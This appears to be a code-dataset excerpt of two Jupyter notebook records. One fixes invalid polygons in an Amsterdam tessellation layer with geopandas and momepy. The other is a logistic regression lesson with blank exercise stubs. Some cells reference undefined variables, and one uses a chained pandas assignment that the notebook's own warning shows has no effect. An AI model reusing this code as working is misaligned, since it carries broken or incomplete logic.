[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb2b4d5af339c69a77f912d4cad9f3ed9ed1abb6 | 113,420 | ipynb | Jupyter Notebook | code_production/Amsterdam/200225_fix_tessellation.ipynb | martinfleis/numerical-taxonomy-paper | bd4880bcce1f662798f60f84ddb7bc654f2bd4fe | [
"CC-BY-4.0"
] | 10 | 2021-05-09T10:44:45.000Z | 2022-01-19T07:06:07.000Z | code_production/Amsterdam/200225_fix_tessellation.ipynb | martinfleis/numerical-taxonomy-paper | bd4880bcce1f662798f60f84ddb7bc654f2bd4fe | [
"CC-BY-4.0"
] | null | null | null | code_production/Amsterdam/200225_fix_tessellation.ipynb | martinfleis/numerical-taxonomy-paper | bd4880bcce1f662798f60f84ddb7bc654f2bd4fe | [
"CC-BY-4.0"
] | null | null | null | 99.230096 | 22,212 | 0.824687 | [
[
[
"import geopandas as gpd\nimport momepy as mm\nimport fiona",
"_____no_output_____"
],
[
"path = '/Users/martin/Dropbox/Academia/Data/Geo/Amsterdam/fix.gpkg'",
"_____no_output_____"
],
[
"layers = fiona.listlayers(path)",
"_____no_output_____"
],
[
"layers",
"_____no_output_____"
],
[
"gdf = gpd.read_file(path, layer=layers[1])",
"_____no_output_____"
],
[
"limit = mm.buffered_limit(gdf)",
"_____no_output_____"
],
[
"tess = mm.Tessellation(gdf, 'uID', limit)",
"100%|██████████| 32/32 [00:00<00:00, 219.77it/s]"
],
[
"tess5 = tess.tessellation",
"_____no_output_____"
],
[
"tess5.plot()",
"_____no_output_____"
],
[
"keep1 = [163866, 163868, 163930, 163893, 150900, 150901, 150903, 150907, 150623]\ndelete1 = keep1",
"_____no_output_____"
],
[
"tess_fix4 = tess4.loc[tess4.uID.isin(keep1)]",
"_____no_output_____"
],
[
"tess_fix4.plot()",
"_____no_output_____"
],
[
"keep2 = [19440, 19433, 19449, 19450, 19451, 19452, 19453, 19448, 19446, 19445, 19454, 19438, 19437, 19436, 19435, 19434, 19444, 19443, 19442,\n 19457, 19455, 19359, 19352]\ndelete2 = keep2",
"_____no_output_____"
],
[
"tess_fix5 = tess5.loc[tess5.uID.isin(keep2)]",
"_____no_output_____"
],
[
"tess_fix5.plot()",
"_____no_output_____"
],
[
"keep3 = [171553, 171643, 171554]",
"_____no_output_____"
],
[
"tess_fix3 = tess3.loc[tess3.uID.isin(keep3)]",
"_____no_output_____"
],
[
"tess_fix3.plot()",
"_____no_output_____"
],
[
"fix = tess_fix4.append(tess_fix5)",
"_____no_output_____"
],
[
"fix",
"_____no_output_____"
],
[
"delete = keep1 + keep2",
"_____no_output_____"
],
[
"delete",
"_____no_output_____"
],
[
"tessellation = gpd.read_file('/Users/martin/Dropbox/Academia/Data/Geo/Amsterdam/queen.gpkg')",
"_____no_output_____"
],
[
"tessellation.shape",
"_____no_output_____"
],
[
"tessellation = tessellation.loc[~tessellation.uID.isin(delete)]",
"_____no_output_____"
],
[
"tessellation.shape",
"_____no_output_____"
],
[
"tessellation = tessellation.append(fix)",
"_____no_output_____"
],
[
"tessellation.shape",
"_____no_output_____"
],
[
"#Check in QGIS and fix invalid using buffer",
"_____no_output_____"
],
[
"validity = tessellation.is_valid",
"_____no_output_____"
],
[
"invalid = tessellation[~validity]",
"_____no_output_____"
],
[
"invalid",
"_____no_output_____"
],
[
"for ix, r in invalid.iterrows():\n g = r.geometry.buffer(0)\n tessellation.loc[ix]['geometry'] = g",
"<ipython-input-43-c1850b5b675a>:3: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n tessellation.loc[ix]['geometry'] = g\n"
],
[
"tessellation[~validity].is_valid",
"_____no_output_____"
],
[
"from shapely.wkt import loads",
"_____no_output_____"
],
[
"buf = invalid.geometry.apply(lambda x: x.buffer(0))",
"_____no_output_____"
],
[
"buf",
"_____no_output_____"
],
[
"tessellation.loc[buf.index, 'geometry'] = buf",
"_____no_output_____"
],
[
"tessellation",
"_____no_output_____"
],
[
"tessellation[['uID', 'geometry']].to_file('/Users/martin/Dropbox/Academia/Data/Geo/Amsterdam/queen.gpkg', layer='tessellation', driver='GPKG')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b58b1c952517ddb870c8d03626e762b0fc00e | 58,493 | ipynb | Jupyter Notebook | C3.Classification_LogReg/RegresionLogistica_student.ipynb | naxvm/ML4all | 8a604560362e12e78fd4698a3109b81ae426d9b2 | [
"MIT"
] | null | null | null | C3.Classification_LogReg/RegresionLogistica_student.ipynb | naxvm/ML4all | 8a604560362e12e78fd4698a3109b81ae426d9b2 | [
"MIT"
] | null | null | null | C3.Classification_LogReg/RegresionLogistica_student.ipynb | naxvm/ML4all | 8a604560362e12e78fd4698a3109b81ae426d9b2 | [
"MIT"
] | null | null | null | 34.672792 | 517 | 0.534885 | [
[
[
"# Logistic Regression\n\n Notebook version: 2.0 (Nov 21, 2017)\n 2.1 (Oct 19, 2018)\n\n Author: Jesús Cid Sueiro ([email protected])\n Jerónimo Arenas García ([email protected])\n\n Changes: v.1.0 - First version\n v.1.1 - Typo correction. Prepared for slide presentation\n v.2.0 - Prepared for Python 3.0 (backcompmatible with 2.7)\n Assumptions for regression model modified\n v.2.1 - Minor changes regarding notation and assumptions",
"_____no_output_____"
]
],
[
[
"from __future__ import print_function\n# To visualize plots in the notebook\n%matplotlib inline\n\n# Imported libraries\nimport csv\nimport random\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pylab\n\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import linear_model\n",
"_____no_output_____"
]
],
[
[
"# Logistic Regression\n\n## 1. Introduction\n\n### 1.1. Binary classification and decision theory. The MAP criterion\n\nThe goal of a classification problem is to assign a *class* or *category* to every *instance* or *observation* of a data collection. Here, we will assume that every instance ${\\bf x}$ is an $N$-dimensional vector in $\\mathbb{R}^N$, and that the class $y$ of sample ${\\bf x}$ is an element of a binary set ${\\mathcal Y} = \\{0, 1\\}$. The goal of a classifier is to predict the true value of $y$ after observing ${\\bf x}$.\n\nWe will denote as $\\hat{y}$ the classifier output or *decision*. If $y=\\hat{y}$, the decision is a *hit*, otherwise $y\\neq \\hat{y}$ and the decision is an *error*.\n",
"_____no_output_____"
],
[
"\nDecision theory provides a solution to the classification problem in situations where the relation between instance ${\\bf x}$ and its class $y$ is given by a known probabilistic model: assume that every tuple $({\\bf x}, y)$ is an outcome of a random vector $({\\bf X}, Y)$ with joint distribution $p_{{\\bf X},Y}({\\bf x}, y)$. A natural criteria for classification is to select predictor $\\hat{Y}=f({\\bf x})$ in such a way that the probability or error, $P\\{\\hat{Y} \\neq Y\\}$ is minimum. Noting that\n\n$$\nP\\{\\hat{Y} \\neq Y\\} = \\int P\\{\\hat{Y} \\neq Y | {\\bf x}\\} p_{\\bf X}({\\bf x}) d{\\bf x}\n$$\n\nthe optimal decision is got if, for every sample ${\\bf x}$, we make decision minimizing the conditional error probability:\n\n\\begin{align}\n\\hat{y}^* &= \\arg\\min_{\\hat{y}} P\\{\\hat{y} \\neq Y |{\\bf x}\\} \\\\\n &= \\arg\\max_{\\hat{y}} P\\{\\hat{y} = Y |{\\bf x}\\} \\\\\n\\end{align}",
"_____no_output_____"
],
[
"\nThus, the optimal decision rule can be expressed as\n\n$$\nP_{Y|{\\bf X}}(1|{\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad P_{Y|{\\bf X}}(0|{\\bf x}) \n$$\n\nor, equivalently\n\n$$\nP_{Y|{\\bf X}}(1|{\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad \\frac{1}{2} \n$$\n\nThe classifier implementing this decision rule is usually referred to as the MAP (*Maximum A Posteriori*) classifier. As we have seen, the MAP classifier minimizes the error probability for binary classification, but the result can also be generalized to multiclass classification problems.",
"_____no_output_____"
],
[
"### 1.2. Parametric classification.\n\nClassical decision theory is grounded on the assumption that the probabilistic model relating the observed sample ${\\bf X}$ and the true hypothesis $Y$ is known. Unfortunately, this is unrealistic in many applications, where the only available information to construct the classifier is a dataset $\\mathcal D = \\{{\\bf x}^{(k)}, y^{(k)}\\}_{k=0}^{K-1}$ of instances and their respective class labels.\n\nA more realistic formulation of the classification problem is the following: given a dataset $\\mathcal D = \\{({\\bf x}^{(k)}, y^{(k)}) \\in {\\mathbb{R}}^N \\times {\\mathcal Y}, \\, k=0,\\ldots,{K-1}\\}$ of independent and identically distributed (i.i.d.) samples from an ***unknown*** distribution $p_{{\\bf X},Y}({\\bf x}, y)$, predict the class $y$ of a new sample ${\\bf x}$ with the minimum probability of error.\n",
"_____no_output_____"
],
[
"\nSince the probabilistic model generating the data is unknown, the MAP decision rule cannot be applied. However, many classification algorithms use the dataset to obtain an estimate of the posterior class probabilities, and apply it to implement an approximation to the MAP decision maker.\n\nParametric classifiers based on this idea assume, additionally, that the posterior class probabilty satisfies some parametric formula:\n\n$$\nP_{Y|X}(1|{\\bf x},{\\bf w}) = f_{\\bf w}({\\bf x})\n$$\n\nwhere ${\\bf w}$ is a vector of parameters. Given the expression of the MAP decision maker, classification consists in comparing the value of $f_{\\bf w}({\\bf x})$ with the threshold $\\frac{1}{2}$, and each parameter vector would be associated to a different decision maker.\n",
"_____no_output_____"
],
[
"In practice, the dataset ${\\mathcal D}$ is used to select a particular parameter vector $\\hat{\\bf w}$ according to certain criterion. Accordingly, the decision rule becomes\n\n$$\nf_{\\hat{\\bf w}}({\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad \\frac{1}{2} \n$$\n\n\nIn this lesson, we explore one of the most popular model-based parametric classification methods: **logistic regression**.\n\n<img src=\"./figs/parametric_decision.png\" width=400>\n",
"_____no_output_____"
],
[
"## 2. Logistic regression.\n\n### 2.1. The logistic function\n\nThe logistic regression model assumes that the binary class label $Y \\in \\{0,1\\}$ of observation $X\\in \\mathbb{R}^N$ satisfies the expression.\n\n$$P_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g({\\bf w}^\\intercal{\\bf x})$$\n$$P_{Y|{\\bf,X}}(0|{\\bf x}, {\\bf w}) = 1-g({\\bf w}^\\intercal{\\bf x})$$\n\nwhere ${\\bf w}$ is a parameter vector and $g(·)$ is the *logistic* function, which is defined by\n\n$$g(t) = \\frac{1}{1+\\exp(-t)}$$\n",
"_____no_output_____"
],
[
"It is straightforward to see that the logistic function has the following properties:\n\n- **P1**: Probabilistic output: $\\quad 0 \\le g(t) \\le 1$\n- **P2**: Symmetry: $\\quad g(-t) = 1-g(t)$\n- **P3**: Monotonicity: $\\quad g'(t) = g(t)·[1-g(t)] \\ge 0$\n\nIn the following we define a logistic function in python, and use it to plot a graphical representation.",
"_____no_output_____"
],
[
"**Exercise 1**: Verify properties P2 and P3.\n\n**Exercise 2**: Implement a function to compute the logistic function, and use it to plot such function in the inverval $[-6,6]$.",
"_____no_output_____"
]
],
[
[
"# Define the logistic function\ndef logistic(t):\n #<SOL>\n #</SOL>\n\n# Plot the logistic function\nt = np.arange(-6, 6, 0.1)\nz = logistic(t)\n\nplt.plot(t, z)\nplt.xlabel('$t$', fontsize=14)\nplt.ylabel('$g(t)$', fontsize=14)\nplt.title('The logistic function')\nplt.grid()",
"_____no_output_____"
]
],
[
[
"### 2.2. Classifiers based on the logistic model.\n\nThe MAP classifier under a logistic model will have the form\n\n$$P_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g({\\bf w}^\\intercal{\\bf x}) \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0} \\quad \\frac{1}{2} $$\n\nTherefore\n\n$$\n2 \\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0} \\quad \n1 + \\exp(-{\\bf w}^\\intercal{\\bf x}) $$\n\nwhich is equivalent to\n\n$${\\bf w}^\\intercal{\\bf x} \n\\quad\\mathop{\\gtrless}^{\\hat{y}=1}_{\\hat{y}=0}\\quad \n0 $$\n\nTherefore, the classifiers based on the logistic model are given by linear decision boundaries passing through the origin, ${\\bf x} = {\\bf 0}$. ",
"_____no_output_____"
]
],
[
[
"# Weight vector:\nw = [4, 8] # Try different weights\n\n# Create a rectangular grid.\nx_min = -1\nx_max = 1\ndx = x_max - x_min\nh = float(dx) / 200\nxgrid = np.arange(x_min, x_max, h)\nxx0, xx1 = np.meshgrid(xgrid, xgrid)\n\n# Compute the logistic map for the given weights\nZ = logistic(w[0]*xx0 + w[1]*xx1)\n\n# Plot the logistic map\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)\nax.contour(xx0, xx1, Z, levels=[0.5], colors='b', linewidths=(3,))\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\nax.set_zlabel('P(1|x,w)')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"The next code fragment represents the output of the same classifier, representing the output of the logistic function in the $x_0$-$x_1$ plane, encoding the value of the logistic function in the representation color.",
"_____no_output_____"
]
],
[
[
"CS = plt.contourf(xx0, xx1, Z)\nCS2 = plt.contour(CS, levels=[0.5],\n colors='m', linewidths=(3,))\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### 3.3. Nonlinear classifiers.\n\nThe logistic model can be extended to construct non-linear classifiers by using non-linear data transformations. A general form for a nonlinear logistic regression model is\n\n$$P_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g[{\\bf w}^\\intercal{\\bf z}({\\bf x})] $$\n\nwhere ${\\bf z}({\\bf x})$ is an arbitrary nonlinear transformation of the original variables. The boundary decision in that case is given by equation\n\n$$\n{\\bf w}^\\intercal{\\bf z} = 0\n$$",
"_____no_output_____"
],
[
"**Exercise 3**: Modify the code above to generate a 3D surface plot of the polynomial logistic regression model given by\n\n$$\nP_{Y|{\\bf X}}(1|{\\bf x}, {\\bf w}) = g(1 + 10 x_0 + 10 x_1 - 20 x_0^2 + 5 x_0 x_1 + x_1^2) \n$$",
"_____no_output_____"
]
],
[
[
"# Weight vector:\nw = [1, 10, 10, -20, 5, 1] # Try different weights\n\n# Create a regtangular grid.\nx_min = -1\nx_max = 1\ndx = x_max - x_min\nh = float(dx) / 200\nxgrid = np.arange(x_min, x_max, h)\nxx0, xx1 = np.meshgrid(xgrid, xgrid)\n\n# Compute the logistic map for the given weights\n# Z = <FILL IN>\n\n# Plot the logistic map\nfig = plt.figure()\nax = fig.gca(projection='3d')\nax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\nax.set_zlabel('P(1|x,w)')\n\nplt.show()",
"_____no_output_____"
],
[
"CS = plt.contourf(xx0, xx1, Z)\nCS2 = plt.contour(CS, levels=[0.5],\n colors='m', linewidths=(3,))\nplt.xlabel('$x_0$')\nplt.ylabel('$x_1$')\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"## 3. Inference\n\nRemember that the idea of parametric classification is to use the training data set $\\mathcal D = \\{({\\bf x}^{(k)}, y^{(k)}) \\in {\\mathbb{R}}^N \\times \\{0,1\\}, k=0,\\ldots,{K-1}\\}$ to set the parameter vector ${\\bf w}$ according to certain criterion. Then, the estimate $\\hat{\\bf w}$ can be used to compute the label prediction for any new observation as \n\n$$\\hat{y} = \\arg\\max_y P_{Y|{\\bf X}}(y|{\\bf x},\\hat{\\bf w}).$$\n\n<img src=\"figs/parametric_decision.png\" width=400>\n\n",
"_____no_output_____"
],
[
"We need still to choose a criterion to optimize with the selection of the parameter vector. In the notebook, we will discuss two different approaches to the estimation of ${\\bf w}$:\n\n * Maximum Likelihood (ML): $\\hat{\\bf w}_{\\text{ML}} = \\arg\\max_{\\bf w} P_{{\\mathcal D}|{\\bf W}}({\\mathcal D}|{\\bf w})$\n * Maximum *A Posteriori* (MAP): $\\hat{\\bf w}_{\\text{MAP}} = \\arg\\max_{\\bf w} p_{{\\bf W}|{\\mathcal D}}({\\bf w}|{\\mathcal D})$\n",
"_____no_output_____"
],
[
"\nFor the mathematical derivation of the logistic regression algorithm, the following representation of the logistic model will be useful: noting that\n\n$$P_{Y|{\\bf X}}(0|{\\bf x}, {\\bf w}) = 1-g[{\\bf w}^\\intercal{\\bf z}({\\bf x})]\n= g[-{\\bf w}^\\intercal{\\bf z}({\\bf x})]$$\n\nwe can write\n\n$$P_{Y|{\\bf X}}(y|{\\bf x}, {\\bf w}) = g[\\overline{y}{\\bf w}^\\intercal{\\bf z}({\\bf x})]$$\n\nwhere $\\overline{y} = 2y-1$ is a *symmetrized label* ($\\overline{y}\\in\\{-1, 1\\}$). ",
"_____no_output_____"
],
[
"### 3.1. Model assumptions\n\nIn the following, we will make the following assumptions:\n\n- **A1**. (Logistic Regression): We assume a logistic model for the *a posteriori* probability of ${Y}$ given ${\\bf X}$, i.e.,\n\n$$P_{Y|{\\bf X}}(y|{\\bf x}, {\\bf w}) = g[{\\bar y}{\\bf w}^\\intercal{\\bf z}({\\bf x})].$$\n\n- **A2**. All samples in ${\\mathcal D}$ have been generated from the same distribution, $p_{{\\bf X}, Y}({\\bf x}, y)$.\n\n- **A3**. Input variables $\\bf x$ do not depend on $\\bf w$. This implies that \n\n$$p({\\bf x}|{\\bf w}) = p({\\bf x})$$\n\n- **A4**. Targets $y^{(0)}, \\cdots, y^{(K-1)}$ are statistically independent given $\\bf w$ and the inputs ${\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}$, that is:\n\n$$P(y^{(0)}, \\cdots, y^{(K-1)} | {\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) = \\prod_{k=0}^{K-1} P(y^{(k)} | {\\bf x}^{(k)}, {\\bf w})$$\n",
"_____no_output_____"
],
[
"### 3.2. ML estimation.\n\nThe ML estimate is defined as\n\n$$\\hat{\\bf w}_{\\text{ML}} = \\arg\\max_{\\bf w} P_{{\\mathcal D}|{\\bf W}}({\\mathcal D}|{\\bf w})$$\n\nUssing assumptions A2 and A3 above, we have that\n\n\\begin{align}\nP_{{\\mathcal D}|{\\bf W}}({\\mathcal D}|{\\bf w}) & = p(y^{(0)}, \\cdots, y^{(K-1)},{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}| {\\bf w}) \\\\\n& = P(y^{(0)}, \\cdots, y^{(K-1)}|{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) \\; p({\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}| {\\bf w}) \\\\\n& = P(y^{(0)}, \\cdots, y^{(K-1)}|{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) \\; p({\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)})\\end{align}\n\nFinally, using assumption A4, we can formulate the ML estimation of $\\bf w$ as the resolution of the following optimization problem\n\n\\begin{align}\n\\hat {\\bf w}_\\text{ML} & = \\arg \\max_{\\bf w} P(y^{(0)}, \\cdots, y^{(K-1)}|{\\bf x}^{(0)}, \\cdots, {\\bf x}^{(K-1)}, {\\bf w}) \\\\\n& = \\arg \\max_{\\bf w} \\prod_{k=0}^{K-1} P(y^{(k)}|{\\bf x}^{(k)}, {\\bf w}) \\\\\n& = \\arg \\max_{\\bf w} \\sum_{k=0}^{K-1} \\log P(y^{(k)}|{\\bf x}^{(k)}, {\\bf w}) \\\\\n& = \\arg \\min_{\\bf w} \\sum_{k=0}^{K-1} - \\log P(y^{(k)}|{\\bf x}^{(k)}, {\\bf w})\n\\end{align}\n\nwhere the arguments of the maximization or minimization problems of the last three lines are usually referred to as the **likelihood**, **log-likelihood** $\\left[L(\\bf w)\\right]$, and **negative log-likelihood** $\\left[\\text{NLL}(\\bf w)\\right]$, respectively.",
"_____no_output_____"
],
[
"\nNow, using A1 (the logistic model)\n\n\\begin{align}\n\\text{NLL}({\\bf w}) \n &= - \\sum_{k=0}^{K-1}\\log\\left[g\\left(\\overline{y}^{(k)}{\\bf w}^\\intercal {\\bf z}^{(k)}\\right)\\right] \\\\\n &= \\sum_{k=0}^{K-1}\\log\\left[1+\\exp\\left(-\\overline{y}^{(k)}{\\bf w}^\\intercal {\\bf z}^{(k)}\\right)\\right]\n\\end{align}\n\nwhere ${\\bf z}^{(k)}={\\bf z}({\\bf x}^{(k)})$.\n",
"_____no_output_____"
],
[
"\nIt can be shown that $\\text{NLL}({\\bf w})$ is a convex and differentiable function of ${\\bf w}$. Therefore, its minimum is a point with zero gradient.\n\n\\begin{align}\n\\nabla_{\\bf w} \\text{NLL}(\\hat{\\bf w}_{\\text{ML}}) \n &= - \\sum_{k=0}^{K-1} \n \\frac{\\exp\\left(-\\overline{y}^{(k)}\\hat{\\bf w}_{\\text{ML}}^\\intercal {\\bf z}^{(k)}\\right) \\overline{y}^{(k)} {\\bf z}^{(k)}}\n {1+\\exp\\left(-\\overline{y}^{(k)}\\hat{\\bf w}_{\\text{ML}}^\\intercal {\\bf z}^{(k)}\n \\right)} = \\\\\n &= - \\sum_{k=0}^{K-1} \\left[y^{(k)}-g(\\hat{\\bf w}_{\\text{ML}}^T {\\bf z}^{(k)})\\right] {\\bf z}^{(k)} = 0\n\\end{align}\n\nUnfortunately, $\\hat{\\bf w}_{\\text{ML}}$ cannot be taken out from the above equation, and some iterative optimization algorithm must be used to search for the minimum.",
"_____no_output_____"
],
[
"### 3.2. Gradient descent.\n\nA simple iterative optimization algorithm is <a href = https://en.wikipedia.org/wiki/Gradient_descent> gradient descent</a>. \n\n\\begin{align}\n{\\bf w}_{n+1} = {\\bf w}_n - \\rho_n \\nabla_{\\bf w} \\text{NLL}({\\bf w}_n)\n\\end{align}\n\nwhere $\\rho_n >0$ is the *learning step*.\n\nApplying the gradient descent rule to logistic regression, we get the following algorithm:\n\n\\begin{align}\n{\\bf w}_{n+1} &= {\\bf w}_n \n + \\rho_n \\sum_{k=0}^{K-1} \\left[y^{(k)}-g({\\bf w}_n^\\intercal {\\bf z}^{(k)})\\right] {\\bf z}^{(k)}\n\\end{align}\n",
"_____no_output_____"
],
[
"\nDefining vectors\n\n\\begin{align}\n{\\bf y} &= [y^{(0)},\\ldots,y^{(K-1)}]^\\top \\\\\n\\hat{\\bf p}_n &= [g({\\bf w}_n^\\top {\\bf z}^{(0)}), \\ldots, g({\\bf w}_n^\\top {\\bf z}^{(K-1)})]^\\top\n\\end{align}\nand matrix\n\\begin{align}\n{\\bf Z} = \\left[{\\bf z}^{(0)},\\ldots,{\\bf z}^{(K-1)}\\right]^\\top\n\\end{align}\n\nwe can write\n\n\\begin{align}\n{\\bf w}_{n+1} &= {\\bf w}_n \n + \\rho_n {\\bf Z}^\\top \\left({\\bf y}-\\hat{\\bf p}_n\\right)\n\\end{align}\n\nIn the following, we will explore the behavior of the gradient descend method using the Iris Dataset.",
"_____no_output_____"
],
[
"#### 3.2.1 Example: Iris Dataset.\n\nAs an illustration, consider the <a href = http://archive.ics.uci.edu/ml/datasets/Iris> Iris dataset </a>, taken from the <a href=http://archive.ics.uci.edu/ml/> UCI Machine Learning repository</a>. This data set contains 3 classes of 50 instances each, where each class refers to a type of iris plant (*setosa*, *versicolor* or *virginica*). Each instance contains 4 measurements of given flowers: sepal length, sepal width, petal length and petal width, all in centimeters. \n\nWe will try to fit the logistic regression model to discriminate between two classes using only two attributes.\n\nFirst, we load the dataset and split them in training and test subsets.",
"_____no_output_____"
]
],
[
[
"# Adapted from a notebook by Jason Brownlee\ndef loadDataset(filename, split):\n xTrain = []\n cTrain = []\n xTest = []\n cTest = []\n\n with open(filename, 'r') as csvfile:\n lines = csv.reader(csvfile)\n dataset = list(lines)\n for i in range(len(dataset)-1):\n for y in range(4):\n dataset[i][y] = float(dataset[i][y])\n item = dataset[i]\n if random.random() < split:\n xTrain.append(item[0:4])\n cTrain.append(item[4])\n else:\n xTest.append(item[0:4])\n cTest.append(item[4])\n return xTrain, cTrain, xTest, cTest\n\nxTrain_all, cTrain_all, xTest_all, cTest_all = loadDataset('iris.data', 0.66)\nnTrain_all = len(xTrain_all)\nnTest_all = len(xTest_all)\nprint('Train:', nTrain_all)\nprint('Test:', nTest_all)",
"_____no_output_____"
]
],
[
[
"Now, we select two classes and two attributes.",
"_____no_output_____"
]
],
[
[
"# Select attributes\ni = 0 # Try 0,1,2,3\nj = 1 # Try 0,1,2,3 with j!=i\n\n# Select two classes\nc0 = 'Iris-versicolor' \nc1 = 'Iris-virginica'\n\n# Select two coordinates\nind = [i, j]\n\n# Take training test\nX_tr = np.array([[xTrain_all[n][i] for i in ind] for n in range(nTrain_all) \n if cTrain_all[n]==c0 or cTrain_all[n]==c1])\nC_tr = [cTrain_all[n] for n in range(nTrain_all) \n if cTrain_all[n]==c0 or cTrain_all[n]==c1]\nY_tr = np.array([int(c==c1) for c in C_tr])\nn_tr = len(X_tr)\n\n# Take test set\nX_tst = np.array([[xTest_all[n][i] for i in ind] for n in range(nTest_all) \n if cTest_all[n]==c0 or cTest_all[n]==c1])\nC_tst = [cTest_all[n] for n in range(nTest_all) \n if cTest_all[n]==c0 or cTest_all[n]==c1]\nY_tst = np.array([int(c==c1) for c in C_tst])\nn_tst = len(X_tst)",
"_____no_output_____"
]
],
[
[
"#### 3.2.2. Data normalization\n\nNormalization of data is a common pre-processing step in many machine learning algorithms. Its goal is to get a dataset where all input coordinates have a similar scale. Learning algorithms usually show less instabilities and convergence problems when data are normalized.\n\nWe will define a normalization function that returns a training data matrix with zero sample mean and unit sample variance.",
"_____no_output_____"
]
],
[
[
"def normalize(X, mx=None, sx=None):\n \n # Compute means and standard deviations\n if mx is None:\n mx = np.mean(X, axis=0)\n if sx is None:\n sx = np.std(X, axis=0)\n\n # Normalize\n X0 = (X-mx)/sx\n\n return X0, mx, sx",
"_____no_output_____"
]
],
[
[
"Now, we can normalize training and test data. Observe in the code that the same transformation should be applied to training and test data. This is the reason why normalization with the test data is done using the means and the variances computed with the training set.",
"_____no_output_____"
]
],
[
[
"# Normalize data\nXn_tr, mx, sx = normalize(X_tr)\nXn_tst, mx, sx = normalize(X_tst, mx, sx)",
"_____no_output_____"
]
],
[
[
"The following figure generates a plot of the normalized training data.",
"_____no_output_____"
]
],
[
[
"# Separate components of x into different arrays (just for the plots)\nx0c0 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==0]\nx1c0 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==0]\nx0c1 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==1]\nx1c1 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==1]\n\n# Scatterplot.\nlabels = {'Iris-setosa': 'Setosa', \n 'Iris-versicolor': 'Versicolor',\n 'Iris-virginica': 'Virginica'}\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.legend(loc='best')\nplt.axis('equal')\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"In order to apply the gradient descent rule, we need to define two methods: \n - A `fit` method, that receives the training data and returns the model weights and the value of the negative log-likelihood during all iterations.\n - A `predict` method, that receives the model weight and a set of inputs, and returns the posterior class probabilities for that input, as well as their corresponding class predictions.",
"_____no_output_____"
]
],
[
[
"def logregFit(Z_tr, Y_tr, rho, n_it):\n\n # Data dimension\n n_dim = Z_tr.shape[1]\n\n # Initialize variables\n nll_tr = np.zeros(n_it)\n pe_tr = np.zeros(n_it)\n Y_tr2 = 2*Y_tr - 1 # Transform labels into binary symmetric.\n w = np.random.randn(n_dim,1)\n\n # Running the gradient descent algorithm\n for n in range(n_it):\n \n # Compute posterior probabilities for weight w\n p1_tr = logistic(np.dot(Z_tr, w))\n\n # Compute negative log-likelihood\n # (note that this is not required for the weight update, only for nll tracking)\n nll_tr[n] = np.sum(np.log(1 + np.exp(-np.dot(Y_tr2*Z_tr, w)))) \n\n # Update weights\n w += rho*np.dot(Z_tr.T, Y_tr - p1_tr)\n \n return w, nll_tr\n\ndef logregPredict(Z, w):\n\n # Compute posterior probability of class 1 for weights w.\n p = logistic(np.dot(Z, w)).flatten()\n \n # Class\n D = [int(round(pn)) for pn in p]\n \n return p, D",
"_____no_output_____"
]
],
[
[
"We can test the behavior of the gradient descent method by fitting a logistic regression model with ${\\bf z}({\\bf x}) = (1, {\\bf x}^\\top)^\\top$.",
"_____no_output_____"
]
],
[
[
